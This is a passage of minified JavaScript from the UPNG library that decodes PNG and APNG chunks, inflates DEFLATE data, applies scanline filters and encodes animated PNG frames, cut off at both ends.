if(2==F.dispose)for(M=0;M<j;M++)$[M]=I[M]}return ie},UPNG.toRGBA8.decodeImage=function(Pe,we,de,ie){var j=we*de,$=UPNG.decode._getBPP(ie),ae=Math.ceil(we*$/8),I=new Uint8Array(4*j),Q=new Uint32Array(I.buffer),F=ie.ctype,E=ie.depth,g=UPNG._bin.readUshort;if(6==F){var b=j<<2;if(8==E)for(var _=0;_<b;_+=4)I[_]=Pe[_],I[_+1]=Pe[_+1],I[_+2]=Pe[_+2],I[_+3]=Pe[_+3];if(16==E)for(_=0;_<b;_++)I[_]=Pe[_<<1]}else if(2==F){var y=ie.tabs.tRNS;if(null==y){if(8==E)for(_=0;_<j;_++){var M=3*_;Q[_]=255<<24|Pe[M+2]<<16|Pe[M+1]<<8|Pe[M]}if(16==E)for(_=0;_<j;_++)Q[_]=255<<24|Pe[4+(M=6*_)]<<16|Pe[M+2]<<8|Pe[M]}else{var p=y[0],D=y[1],w=y[2];if(8==E)for(_=0;_<j;_++){var x=_<<2;Q[_]=255<<24|Pe[2+(M=3*_)]<<16|Pe[M+1]<<8|Pe[M],Pe[M]==p&&Pe[M+1]==D&&Pe[M+2]==w&&(I[x+3]=0)}if(16==E)for(_=0;_<j;_++)x=_<<2,Q[_]=255<<24|Pe[4+(M=6*_)]<<16|Pe[M+2]<<8|Pe[M],g(Pe,M)==p&&g(Pe,M+2)==D&&g(Pe,M+4)==w&&(I[x+3]=0)}}else if(3==F){var S=ie.tabs.PLTE,O=ie.tabs.tRNS,U=O?O.length:0;if(1==E)for(var K=0;K<de;K++){var ee=K*ae,se=K*we;for(_=0;_<we;_++){var ve=3*(le=Pe[ee+(_>>3)]>>7-((7&_)<<0)&1);I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255}}if(2==E)for(K=0;K<de;K++)for(ee=K*ae,se=K*we,_=0;_<we;_++)ve=3*(le=Pe[ee+(_>>2)]>>6-((3&_)<<1)&3),I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255;if(4==E)for(K=0;K<de;K++)for(ee=K*ae,se=K*we,_=0;_<we;_++)ve=3*(le=Pe[ee+(_>>1)]>>4-((1&_)<<2)&15),I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255;if(8==E)for(_=0;_<j;_++){var le;ve=3*(le=Pe[_]),I[x=_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255}}else if(4==F){if(8==E)for(_=0;_<j;_++){var ye=Pe[z=_<<1];I[x=_<<2]=ye,I[x+1]=ye,I[x+2]=ye,I[x+3]=Pe[z+1]}if(16==E)for(_=0;_<j;_++){var z;ye=Pe[z=_<<2],I[x=_<<2]=ye,I[x+1]=ye,I[x+2]=ye,I[x+3]=Pe[z+2]}}else if(0==F)for(p=ie.tabs.tRNS?ie.tabs.tRNS:-1,K=0;K<de;K++){var l=K*ae,f=K*we;if(1==E)for(var A=0;A<we;A++){var v=(ye=255*(Pe[l+(A>>>3)]>>>7-(7&A)&1))==255*p?0:255;Q[f+A]=v<<24|ye<<16|ye<<8|ye}else if(2==E)for(A=0;A<we;A++)v=(ye=85*(Pe[l+(A>>>2)]>>>6-((3&A)<<1)&3))==85*p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(4==E)for(A=0;A<we;A++)v=(ye=17*(Pe[l+(A>>>1)]>>>4-((1&A)<<2)&15))==17*p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(8==E)for(A=0;A<we;A++)v=(ye=Pe[l+A])==p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(16==E)for(A=0;A<we;A++)ye=Pe[l+(A<<1)],v=g(Pe,l+(A<<_))==p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye}return I},UPNG.decode=function(Pe){for(var we,de=new Uint8Array(Pe),ie=8,j=UPNG._bin,$=j.readUshort,ae=j.readUint,I={tabs:{},frames:[]},Q=new Uint8Array(de.length),F=0,E=0,g=[137,80,78,71,13,10,26,10],b=0;b<8;b++)if(de[b]!=g[b])throw"The input is not a PNG file!";for(;ie<de.length;){var _=j.readUint(de,ie),y=j.readASCII(de,ie+=4,4);if(ie+=4,"IHDR"==y)UPNG.decode._IHDR(de,ie,I);else if("CgBI"==y)I.tabs[y]=de.slice(ie,ie+4);else if("IDAT"==y){for(b=0;b<_;b++)Q[F+b]=de[ie+b];F+=_}else if("acTL"==y)I.tabs[y]={num_frames:ae(de,ie),num_plays:ae(de,ie+4)},we=new Uint8Array(de.length);else if("fcTL"==y){var M;0!=E&&((M=I.frames[I.frames.length-1]).data=UPNG.decode._decompress(I,we.slice(0,E),M.rect.width,M.rect.height),E=0);var p={x:ae(de,ie+12),y:ae(de,ie+16),width:ae(de,ie+4),height:ae(de,ie+8)},D=$(de,ie+22);D=$(de,ie+20)/(0==D?100:D);var w={rect:p,delay:Math.round(1e3*D),dispose:de[ie+24],blend:de[ie+25]};I.frames.push(w)}else if("fdAT"==y){for(b=0;b<_-4;b++)we[E+b]=de[ie+b+4];E+=_-4}else if("pHYs"==y)I.tabs[y]=[j.readUint(de,ie),j.readUint(de,ie+4),de[ie+8]];else if("cHRM"==y)for(I.tabs[y]=[],b=0;b<8;b++)I.tabs[y].push(j.readUint(de,ie+4*b));else if("tEXt"==y||"zTXt"==y){null==I.tabs[y]&&(I.tabs[y]={});var x=j.nextZero(de,ie),S=j.readASCII(de,ie,x-ie),O=ie+_-x-1;if("tEXt"==y)ee=j.readASCII(de,x+1,O);else{var U=UPNG.decode._inflate(de.slice(x+2,x+2+O));ee=j.readUTF8(U,0,U.length)}I.tabs[y][S]=ee}else if("iTXt"==y){null==I.tabs[y]&&(I.tabs[y]={}),x=0;var K=ie;x=j.nextZero(de,K),S=j.readASCII(de,K,x-K);var ee,se=de[K=x+1];x=j.nextZero(de,K+=2),j.readASCII(de,K,x-K),x=j.nextZero(de,K=x+1),j.readUTF8(de,K,x-K),O=_-((K=x+1)-ie),0==se?ee=j.readUTF8(de,K,O):(U=UPNG.decode._inflate(de.slice(K,K+O)),ee=j.readUTF8(U,0,U.length)),I.tabs[y][S]=ee}else if("PLTE"==y)I.tabs[y]=j.readBytes(de,ie,_);else if("hIST"==y){var ve=I.tabs.PLTE.length/3;for(I.tabs[y]=[],b=0;b<ve;b++)I.tabs[y].push($(de,ie+2*b))}else if("tRNS"==y)3==I.ctype?I.tabs[y]=j.readBytes(de,ie,_):0==I.ctype?I.tabs[y]=$(de,ie):2==I.ctype&&(I.tabs[y]=[$(de,ie),$(de,ie+2),$(de,ie+4)]);else if("gAMA"==y)I.tabs[y]=j.readUint(de,ie)/1e5;else if("sRGB"==y)I.tabs[y]=de[ie];else if("bKGD"==y)0==I.ctype||4==I.ctype?I.tabs[y]=[$(de,ie)]:2==I.ctype||6==I.ctype?I.tabs[y]=[$(de,ie),$(de,ie+2),$(de,ie+4)]:3==I.ctype&&(I.tabs[y]=de[ie]);else if("IEND"==y)break;j.readUint(de,ie+=_),ie+=4}return 0!=E&&((M=I.frames[I.frames.length-1]).data=UPNG.decode._decompress(I,we.slice(0,E),M.rect.width,M.rect.height),E=0),I.data=UPNG.decode._decompress(I,Q,I.width,I.height),delete I.compress,delete I.interlace,delete I.filter,I},UPNG.decode._decompress=function(Pe,we,de,ie){var j=UPNG.decode._getBPP(Pe),$=Math.ceil(de*j/8),ae=new Uint8Array(($+1+Pe.interlace)*ie);return we=Pe.tabs.CgBI?UPNG.inflateRaw(we,ae):UPNG.decode._inflate(we,ae),0==Pe.interlace?we=UPNG.decode._filterZero(we,Pe,0,de,ie):1==Pe.interlace&&(we=UPNG.decode._readInterlace(we,Pe)),we},UPNG.decode._inflate=function(Pe,we){return UPNG.inflateRaw(new Uint8Array(Pe.buffer,2,Pe.length-6),we)},UPNG.inflateRaw=(H={},H.H={},H.H.N=function(Pe,we){var de,ie,j=Uint8Array,$=0,ae=0,I=0,Q=0,F=0,E=0,g=0,b=0,_=0;if(3==Pe[0]&&0==Pe[1])return we||new j(0);var y=H.H,M=y.b,p=y.e,D=y.R,w=y.n,x=y.A,S=y.Z,O=y.m,U=null==we;for(U&&(we=new j(Pe.length>>>2<<5));0==$;)if($=M(Pe,_,1),ae=M(Pe,_+1,2),_+=3,0!=ae){if(U&&(we=H.H.W(we,b+(1<<17))),1==ae&&(de=O.J,ie=O.h,E=511,g=31),2==ae){I=p(Pe,_,5)+257,Q=p(Pe,_+5,5)+1,F=p(Pe,_+10,4)+4,_+=14;for(var K=1,ee=0;ee<38;ee+=2)O.Q[ee]=0,O.Q[ee+1]=0;for(ee=0;ee<F;ee++){var se=p(Pe,_+3*ee,3);O.Q[1+(O.X[ee]<<1)]=se,se>K&&(K=se)}_+=3*F,w(O.Q,K),x(O.Q,K,O.u),de=O.w,ie=O.d,_=D(O.u,(1<<K)-1,I+Q,Pe,_,O.v);var ve=y.V(O.v,0,I,O.C);E=(1<<ve)-1;var le=y.V(O.v,I,Q,O.D);g=(1<<le)-1,w(O.C,ve),x(O.C,ve,de),w(O.D,le),x(O.D,le,ie)}for(;;){var ye=de[S(Pe,_)&E];_+=15&ye;var z=ye>>>4;if(z>>>8==0)we[b++]=z;else{if(256==z)break;var l=b+z-254;if(z>264){var f=O.q[z-257];l=b+(f>>>3)+p(Pe,_,7&f),_+=7&f}var A=ie[S(Pe,_)&g],P=O.c[A>>>4],G=(P>>>4)+M(Pe,_+=15&A,15&P);for(_+=15&P;b<l;)we[b]=we[b++-G],we[b]=we[b++-G],we[b]=we[b++-G],we[b]=we[b++-G];b=l}}}else{0!=(7&_)&&(_+=8-(7&_));var X=4+(_>>>3),L=Pe[X-4]|Pe[X-3]<<8;U&&(we=H.H.W(we,b+L)),we.set(new j(Pe.buffer,Pe.byteOffset+X,L),b),_=X+L<<3,b+=L}return we.length==b?we:we.slice(0,b)},H.H.W=function(Pe,we){var de=Pe.length;if(we<=de)return Pe;var ie=new Uint8Array(de<<1);return ie.set(Pe,0),ie},H.H.R=function(Pe,we,de,ie,j,$){for(var ae=H.H.e,I=H.H.Z,Q=0;Q<de;){var F=Pe[I(ie,j)&we];j+=15&F;var E=F>>>4;if(E<=15)$[Q]=E,Q++;else{var g=0,b=0;16==E?(b=3+ae(ie,j,2),j+=2,g=$[Q-1]):17==E?(b=3+ae(ie,j,3),j+=3):18==E&&(b=11+ae(ie,j,7),j+=7);for(var _=Q+b;Q<_;)$[Q]=g,Q++}}return j},H.H.V=function(Pe,we,de,ie){for(var j=0,$=0,ae=ie.length>>>1;$<de;){var I=Pe[$+we];ie[$<<1]=0,ie[1+($<<1)]=I,I>j&&(j=I),$++}for(;$<ae;)ie[$<<1]=0,ie[1+($<<1)]=0,$++;return j},H.H.n=function(Pe,we){for(var de,ie,j,$,ae=H.H.m,I=Pe.length,Q=ae.j,F=0;F<=we;F++)Q[F]=0;for(F=1;F<I;F+=2)Q[Pe[F]]++;var E=ae.K;for(de=0,Q[0]=0,ie=1;ie<=we;ie++)E[ie]=de=de+Q[ie-1]<<1;for(j=0;j<I;j+=2)0!=($=Pe[j+1])&&(Pe[j]=E[$],E[$]++)},H.H.A=function(Pe,we,de){for(var ie=Pe.length,j=H.H.m.r,$=0;$<ie;$+=2)if(0!=Pe[$+1])for(var I=Pe[$+1],Q=$>>1<<4|I,F=we-I,E=Pe[$]<<F,g=E+(1<<F);E!=g;)de[j[E]>>>15-we]=Q,E++},H.H.l=function(Pe,we){for(var de=H.H.m.r,ie=15-we,j=0;j<Pe.length;j+=2)Pe[j]=de[Pe[j]<<we-Pe[j+1]]>>>ie},H.H.M=function(Pe,we,de){var ie=we>>>3;Pe[ie]|=de<<=7&we,Pe[ie+1]|=de>>>8},H.H.I=function(Pe,we,de){var ie=we>>>3;Pe[ie]|=de<<=7&we,Pe[ie+1]|=de>>>8,Pe[ie+2]|=de>>>16},H.H.e=function(Pe,we,de){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8)>>>(7&we)&(1<<de)-1},H.H.b=function(Pe,we,de){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16)>>>(7&we)&(1<<de)-1},H.H.Z=function(Pe,we){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16)>>>(7&we)},H.H.i=function(Pe,we){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16|Pe[3+(we>>>3)]<<24)>>>(7&we)},H.H.m=(N=Uint16Array,W=Uint32Array,{K:new N(16),j:new N(16),X:[16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15],S:[3,4,5,6,7,8,9,10,11,13,15,17,19,23,27,31,35,43,51,59,67,83,99,115,131,163,195,227,258,999,999,999],T:[0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,0,0,0],q:new N(32),p:[1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577,65535,65535],z:[0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13,0,0],c:new W(32),J:new N(512),_:[],h:new N(32),$:[],w:new N(32768),C:[],v:[],d:new N(32768),D:[],u:new N(512),Q:[],r:new N(32768),s:new W(286),Y:new W(30),a:new W(19),t:new W(15e3),k:new N(65536),g:new N(32768)}),function(){for(var Pe=H.H.m,we=0;we<32768;we++){var de=we;de=(4278255360&(de=(4042322160&(de=(3435973836&(de=(2863311530&de)>>>1|(1431655765&de)<<1))>>>2|(858993459&de)<<2))>>>4|(252645135&de)<<4))>>>8|(16711935&de)<<8,Pe.r[we]=(de>>>16|de<<16)>>>17}function ie(j,$,ae){for(;0!=$--;)j.push(0,ae)}for(we=0;we<32;we++)Pe.q[we]=Pe.S[we]<<3|Pe.T[we],Pe.c[we]=Pe.p[we]<<4|Pe.z[we];ie(Pe._,144,8),ie(Pe._,112,9),ie(Pe._,24,7),ie(Pe._,8,8),H.H.n(Pe._,9),H.H.A(Pe._,9,Pe.J),H.H.l(Pe._,9),ie(Pe.$,32,5),H.H.n(Pe.$,5),H.H.A(Pe.$,5,Pe.h),H.H.l(Pe.$,5),ie(Pe.Q,19,0),ie(Pe.C,286,0),ie(Pe.D,30,0),ie(Pe.v,320,0)}(),H.H.N),UPNG.decode._readInterlace=function(Pe,we){for(var de=we.width,ie=we.height,j=UPNG.decode._getBPP(we),$=j>>3,ae=Math.ceil(de*j/8),I=new Uint8Array(ie*ae),Q=0,F=[0,0,4,0,2,0,1],E=[0,4,0,2,0,1,0],g=[8,8,8,4,4,2,2],b=[8,8,4,4,2,2,1],_=0;_<7;){for(var y=g[_],M=b[_],p=0,D=0,w=F[_];w<ie;)w+=y,D++;for(var x=E[_];x<de;)x+=M,p++;var S=Math.ceil(p*j/8);UPNG.decode._filterZero(Pe,we,Q,p,D);for(var O=0,U=F[_];U<ie;){for(var K=E[_],ee=Q+O*S<<3;K<de;){var se;if(1==j&&(se=(se=Pe[ee>>3])>>7-(7&ee)&1,I[U*ae+(K>>3)]|=se<<7-((7&K)<<0)),2==j&&(se=(se=Pe[ee>>3])>>6-(7&ee)&3,I[U*ae+(K>>2)]|=se<<6-((3&K)<<1)),4==j&&(se=(se=Pe[ee>>3])>>4-(7&ee)&15,I[U*ae+(K>>1)]|=se<<4-((1&K)<<2)),j>=8)for(var ve=U*ae+K*$,le=0;le<$;le++)I[ve+le]=Pe[(ee>>3)+le];ee+=j,K+=M}O++,U+=y}p*D!=0&&(Q+=D*(1+S)),_+=1}return I},UPNG.decode._getBPP=function(Pe){return[1,null,3,1,2,null,4][Pe.ctype]*Pe.depth},UPNG.decode._filterZero=function(Pe,we,de,ie,j){var $=UPNG.decode._getBPP(we),ae=Math.ceil(ie*$/8),I=UPNG.decode._paeth;$=Math.ceil($/8);var Q=0,F=1,E=Pe[de],g=0;if(E>1&&(Pe[de]=[0,0,1][E-2]),3==E)for(g=$;g<ae;g++)Pe[g+1]=Pe[g+1]+(Pe[g+1-$]>>>1)&255;for(var b=0;b<j;b++)if(g=0,0==(E=Pe[(F=(Q=de+b*ae)+b+1)-1]))for(;g<ae;g++)Pe[Q+g]=Pe[F+g];else if(1==E){for(;g<$;g++)Pe[Q+g]=Pe[F+g];for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+Pe[Q+g-$]}else if(2==E)for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+Pe[Q+g-ae];else if(3==E){for(;g<$;g++)Pe[Q+g]=Pe[F+g]+(Pe[Q+g-ae]>>>1);for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+(Pe[Q+g-ae]+Pe[Q+g-$]>>>1)}else{for(;g<$;g++)Pe[Q+g]=Pe[F+g]+I(0,Pe[Q+g-ae],0);for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+I(Pe[Q+g-$],Pe[Q+g-ae],Pe[Q+g-$-ae])}return Pe},UPNG.decode._paeth=function(Pe,we,de){var ie=Pe+we-de,j=ie-Pe,$=ie-we,ae=ie-de;return j*j<=$*$&&j*j<=ae*ae?Pe:$*$<=ae*ae?we:de},UPNG.decode._IHDR=function(Pe,we,de){var ie=UPNG._bin;de.width=ie.readUint(Pe,we),de.height=ie.readUint(Pe,we+=4),de.depth=Pe[we+=4],we++,de.ctype=Pe[we],we++,de.compress=Pe[we],we++,de.filter=Pe[we],we++,de.interlace=Pe[we],we++},UPNG._bin={nextZero:function(we,de){for(;0!=we[de];)de++;return de},readUshort:function(we,de){return we[de]<<8|we[de+1]},writeUshort:function(we,de,ie){we[de]=ie>>8&255,we[de+1]=255&ie},readUint:function(we,de){return 16777216*we[de]+(we[de+1]<<16|we[de+2]<<8|we[de+3])},writeUint:function(we,de,ie){we[de]=ie>>24&255,we[de+1]=ie>>16&255,we[de+2]=ie>>8&255,we[de+3]=255&ie},readASCII:function(we,de,ie){for(var j="",$=0;$<ie;$++)j+=String.fromCharCode(we[de+$]);return j},writeASCII:function(we,de,ie){for(var j=0;j<ie.length;j++)we[de+j]=ie.charCodeAt(j)},readBytes:function(we,de,ie){for(var j=[],$=0;$<ie;$++)j.push(we[de+$]);return j},pad:function(we){return we.length<2?"0".concat(we):we},readUTF8:function(we,de,ie){for(var j,$="",ae=0;ae<ie;ae++)$+="%".concat(UPNG._bin.pad(we[de+ae].toString(16)));try{j=decodeURIComponent($)}catch(I){return UPNG._bin.readASCII(we,de,ie)}return j}},UPNG._copyTile=function(Pe,we,de,ie,j,$,ae,I,Q){for(var F=Math.min(we,j),E=Math.min(de,$),g=0,b=0,_=0;_<E;_++)for(var y=0;y<F;y++)if(ae>=0&&I>=0?(g=_*we+y<<2,b=(I+_)*j+ae+y<<2):(g=(-I+_)*we-ae+y<<2,b=_*j+y<<2),0==Q)ie[b]=Pe[g],ie[b+1]=Pe[g+1],ie[b+2]=Pe[g+2],ie[b+3]=Pe[g+3];else if(1==Q){var M=.00392156862745098*Pe[g+3],p=Pe[g]*M,D=Pe[g+1]*M,w=Pe[g+2]*M,x=ie[b+3]*(1/255),S=ie[b]*x,O=ie[b+1]*x,U=ie[b+2]*x,K=1-M,ee=M+x*K,se=0==ee?0:1/ee;ie[b+3]=255*ee,ie[b+0]=(p+S*K)*se,ie[b+1]=(D+O*K)*se,ie[b+2]=(w+U*K)*se}else if(2==Q)p=Pe[g],D=Pe[g+1],w=Pe[g+2],S=ie[b],O=ie[b+1],U=ie[b+2],(M=Pe[g+3])==(x=ie[b+3])&&p==S&&D==O&&w==U?(ie[b]=0,ie[b+1]=0,ie[b+2]=0,ie[b+3]=0):(ie[b]=p,ie[b+1]=D,ie[b+2]=w,ie[b+3]=M);else if(3==Q){if(p=Pe[g],D=Pe[g+1],w=Pe[g+2],S=ie[b],O=ie[b+1],U=ie[b+2],(M=Pe[g+3])==(x=ie[b+3])&&p==S&&D==O&&w==U)continue;if(M<220&&x>20)return!1}return!0},UPNG.encode=function(Pe,we,de,ie,j,$,ae){null==ie&&(ie=0),null==ae&&(ae=!1);var I=UPNG.encode.compress(Pe,we,de,ie,[!1,!1,!1,0,ae]);return UPNG.encode.compressPNG(I,-1),UPNG.encode._main(I,we,de,j,$)},UPNG.encodeLL=function(Pe,we,de,ie,j,$,ae,I){for(var Q={ctype:0+(1==ie?0:2)+(0==j?0:4),depth:$,frames:[]},F=(ie+j)*$,E=F*we,g=0;g<Pe.length;g++)Q.frames.push({rect:{x:0,y:0,width:we,height:de},img:new Uint8Array(Pe[g]),blend:0,dispose:1,bpp:Math.ceil(F/8),bpl:Math.ceil(E/8)});return UPNG.encode.compressPNG(Q,0,!0),UPNG.encode._main(Q,we,de,ae,I)},UPNG.encode._main=function(Pe,we,de,ie,j){null==j&&(j={});var $=UPNG.crc.crc,ae=UPNG._bin.writeUint,I=UPNG._bin.writeUshort,Q=UPNG._bin.writeASCII,F=8,E=Pe.frames.length>1,g=!1,b=33+(E?20:0);if(null!=j.sRGB&&(b+=13),null!=j.pHYs&&(b+=21),3==Pe.ctype){for(var _=Pe.plte.length,y=0;y<_;y++)Pe.plte[y]>>>24!=255&&(g=!0);b+=8+3*_+4+(g?8+1*_+4:0)}for(var M=0;M<Pe.frames.length;M++)E&&(b+=38),b+=(ee=Pe.frames[M]).cimg.length+12,0!=M&&(b+=4);b+=12;var p=new Uint8Array(b),D=[137,80,78,71,13,10,26,10];for(y=0;y<8;y++)p[y]=D[y];if(ae(p,F,13),Q(p,F+=4,"IHDR"),ae(p,F+=4,we),ae(p,F+=4,de),p[F+=4]=Pe.depth,p[++F]=Pe.ctype,p[++F]=0,p[++F]=0,p[++F]=0,ae(p,++F,$(p,F-17,17)),F+=4,null!=j.sRGB&&(ae(p,F,1),Q(p,F+=4,"sRGB"),p[F+=4]=j.sRGB,ae(p,++F,$(p,F-5,5)),F+=4),null!=j.pHYs&&(ae(p,F,9),Q(p,F+=4,"pHYs"),ae(p,F+=4,j.pHYs[0]),ae(p,F+=4,j.pHYs[1]),p[F+=4]=j.pHYs[2],ae(p,++F,$(p,F-13,13)),F+=4),E&&(ae(p,F,8),Q(p,F+=4,"acTL"),ae(p,F+=4,Pe.frames.length),ae(p,F+=4,null!=j.loop?j.loop:0),ae(p,F+=4,$(p,F-12,12)),F+=4),3==Pe.ctype){for(ae(p,F,3*(_=Pe.plte.length)),Q(p,F+=4,"PLTE"),F+=4,y=0;y<_;y++){var w=3*y,x=Pe.plte[y],O=x>>>8&255,U=x>>>16&255;p[F+w+0]=255&x,p[F+w+1]=O,p[F+w+2]=U}if(ae(p,F+=3*_,$(p,F-3*_-4,3*_+4)),F+=4,g){for(ae(p,F,_),Q(p,F+=4,"tRNS"),F+=4,y=0;y<_;y++)p[F+y]=Pe.plte[y]>>>24&255;ae(p,F+=_,$(p,F-_-4,_+4)),F+=4}}var K=0;for(M=0;M<Pe.frames.length;M++){var ee=Pe.frames[M];E&&(ae(p,F,26),Q(p,F+=4,"fcTL"),ae(p,F+=4,K++),ae(p,F+=4,ee.rect.width),ae(p,F+=4,ee.rect.height),ae(p,F+=4,ee.rect.x),ae(p,F+=4,ee.rect.y),I(p,F+=4,ie[M]),I(p,F+=2,1e3),p[F+=2]=ee.dispose,p[++F]=ee.blend,ae(p,++F,$(p,F-30,30)),F+=4);var se=ee.cimg;ae(p,F,(_=se.length)+(0==M?0:4));var ve=F+=4;Q(p,F,0==M?"IDAT":"fdAT"),F+=4,0!=M&&(ae(p,F,K++),F+=4),p.set(se,F),ae(p,F+=_,$(p,ve,F-ve)),F+=4}return ae(p,F,0),Q(p,F+=4,"IEND"),ae(p,F+=4,$(p,F-4,4)),F+=4,p.buffer},UPNG.encode.compressPNG=function(Pe,we,de){for(var ie=0;ie<Pe.frames.length;ie++){var j=Pe.frames[ie],$=j.rect.height,ae=new Uint8Array($*j.bpl+$);j.cimg=UPNG.encode._filterZero(j.img,$,j.bpp,j.bpl,ae,we,de)}},UPNG.encode.compress=function(Pe,we,de,ie,j){for(var $=j[0],ae=j[1],I=j[2],Q=j[3],F=j[4],E=6,g=8,b=255,_=0;_<Pe.length;_++)for(var y=new Uint8Array(Pe[_]),M=y.length,p=0;p<M;p+=4)b&=y[p+3];var D=255!=b,w=UPNG.encode.framize(Pe,we,de,$,ae,I),x={},S=[],O=[];if(0!=ie){var U=[];for(p=0;p<w.length;p++)U.push(w[p].img.buffer);var K=UPNG.encode.concatRGBA(U),ee=UPNG.quantize(K,ie),se=0,ve=new Uint8Array(ee.abuf);for(p=0;p<w.length;p++){var le=(Ue=w[p].img).length;for(O.push(new Uint8Array(ee.inds.buffer,se>>2,le>>2)),_=0;_<le;_+=4)Ue[_]=ve[se+_],Ue[_+1]=ve[se+_+1],Ue[_+2]=ve[se+_+2],Ue[_+3]=ve[se+_+3];se+=le}for(p=0;p<ee.plte.length;p++)S.push(ee.plte[p].est.rgba)}else for(_=0;_<w.length;_++){var ye=w[_],z=new Uint32Array(ye.img.buffer),l=ye.rect.width,f=(M=z.length,new Uint8Array(M));for(O.push(f),p=0;p<M;p++){var A=z[p];if(0!=p&&A==z[p-1])f[p]=f[p-1];else if(p>l&&A==z[p-l])f[p]=f[p-l];else{var v=x[A];if(null==v&&(x[A]=v=S.length,S.push(A),S.length>=300))break;f[p]=v}}}var P=S.length;for(P<=256&&0==F&&(g=P<=2?1:P<=4?2:P<=16?4:8,g=Math.max(g,Q)),_=0;_<w.length;_++){l=(ye=w[_]).rect.width;var G=ye.rect.height,X=ye.img;new Uint32Array(X.buffer);var L=4*l,h=4;if(P<=256&&0==F){L=Math.ceil(g*l/8);for(var R=new Uint8Array(L*G),J=O[_],Z=0;Z<G;Z++){p=Z*L;var ue=Z*l;if(8==g)for(var Ie=0;Ie<l;Ie++)R[p+Ie]=J[ue+Ie];else if(4==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>1)]|=J[ue+Ie]<<4-4*(1&Ie);else if(2==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>2)]|=J[ue+Ie]<<6-2*(3&Ie);else if(1==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>3)]|=J[ue+Ie]<<7-1*(7&Ie)}X=R,E=3,h=1}else if(0==D&&1==w.length){R=new Uint8Array(l*G*3);var Ae=l*G;for(p=0;p<Ae;p++){var Ue,Xe=4*p;R[Ue=3*p]=X[Xe],R[Ue+1]=X[Xe+1],R[Ue+2]=X[Xe+2]}X=R,E=2,h=3,L=3*l}ye.img=X,ye.bpl=L,ye.bpp=h}return{ctype:E,depth:g,plte:S,frames:w}},UPNG.encode.framize=function(Pe,we,de,ie,j,$){for(var ae=[],I=0;I<Pe.length;I++){var Q,F=new Uint8Array(Pe[I]),E=new Uint32Array(F.buffer),g=0,b=0,_=we,y=de,M=ie?1:0;if(0!=I){for(var p=$||ie||1==I||0!=ae[I-2].dispose?1:2,D=0,w=1e9,x=0;x<p;x++){for(var S=new Uint8Array(Pe[I-1-x]),O=new Uint32Array(Pe[I-1-x]),U=we,K=de,ee=-1,se=-1,ve=0;ve<de;ve++)for(var le=0;le<we;le++)E[P=ve*we+le]!=O[P]&&(le<U&&(U=le),le>ee&&(ee=le),ve<K&&(K=ve),ve>se&&(se=ve));-1==ee&&(U=K=ee=se=0),j&&(1==(1&U)&&U--,1==(1&K)&&K--);var ye=(ee-U+1)*(se-K+1);ye<w&&(w=ye,D=x,g=U,b=K,_=ee-U+1,y=se-K+1)}S=new Uint8Array(Pe[I-1-D]),1==D&&(ae[I-1].dispose=2),Q=new Uint8Array(_*y*4),UPNG._copyTile(S,we,de,Q,_,y,-g,-b,0),1==(M=UPNG._copyTile(F,we,de,Q,_,y,-g,-b,3)?1:0)?UPNG.encode._prepareDiff(F,we,de,Q,{x:g,y:b,width:_,height:y}):UPNG._copyTile(F,we,de,Q,_,y,-g,-b,0)}else Q=F.slice(0);ae.push({rect:{x:g,y:b,width:_,height:y},img:Q,blend:M,dispose:0})}if(ie)for(I=0;I<ae.length;I++)if(1!=(G=ae[I]).blend){var z=G.rect,l=ae[I-1].rect,f=Math.min(z.x,l.x),A=Math.min(z.y,l.y),v={x:f,y:A,width:Math.max(z.x+z.width,l.x+l.width)-f,height:Math.max(z.y+z.height,l.y+l.height)-A};ae[I-1].dispose=1,I-1!=0&&UPNG.encode._updateFrame(Pe,we,de,ae,I-1,v,j),UPNG.encode._updateFrame(Pe,we,de,ae,I,v,j)}if(1!=Pe.length)for(var P=0;P<ae.length;P++){var G;G=ae[P]}return ae},UPNG.encode._updateFrame=function(Pe,we,de,ie,j,$,ae){for(var I=Uint8Array,Q=Uint32Array,F=new I(Pe[j-1]),E=new Q(Pe[j-1]),g=j+1<Pe.length?new I(Pe[j+1]):null,b=new I(Pe[j]),_=new Q(b.buffer),y=we,M=de,p=-1,D=-1,w=0;w<$.height;w++)for(var x=0;x<$.width;x++){var S=$.x+x,O=$.y+w,U=O*we+S,K=_[U];0==K||0==ie[j-1].dispose&&E[U]==K&&(null==g||0!=g[4*U+3])||(S<y&&(y=S),S>p&&(p=S),O<M&&(M=O),O>D&&(D=O))}-1==p&&(y=M=p=D=0),ae&&(1==(1&y)&&y--,1==(1&M)&&M--);var ee=ie[j];ee.rect=$={x:y,y:M,width:p-y+1,height:D-M+1},ee.blend=1,ee.img=new 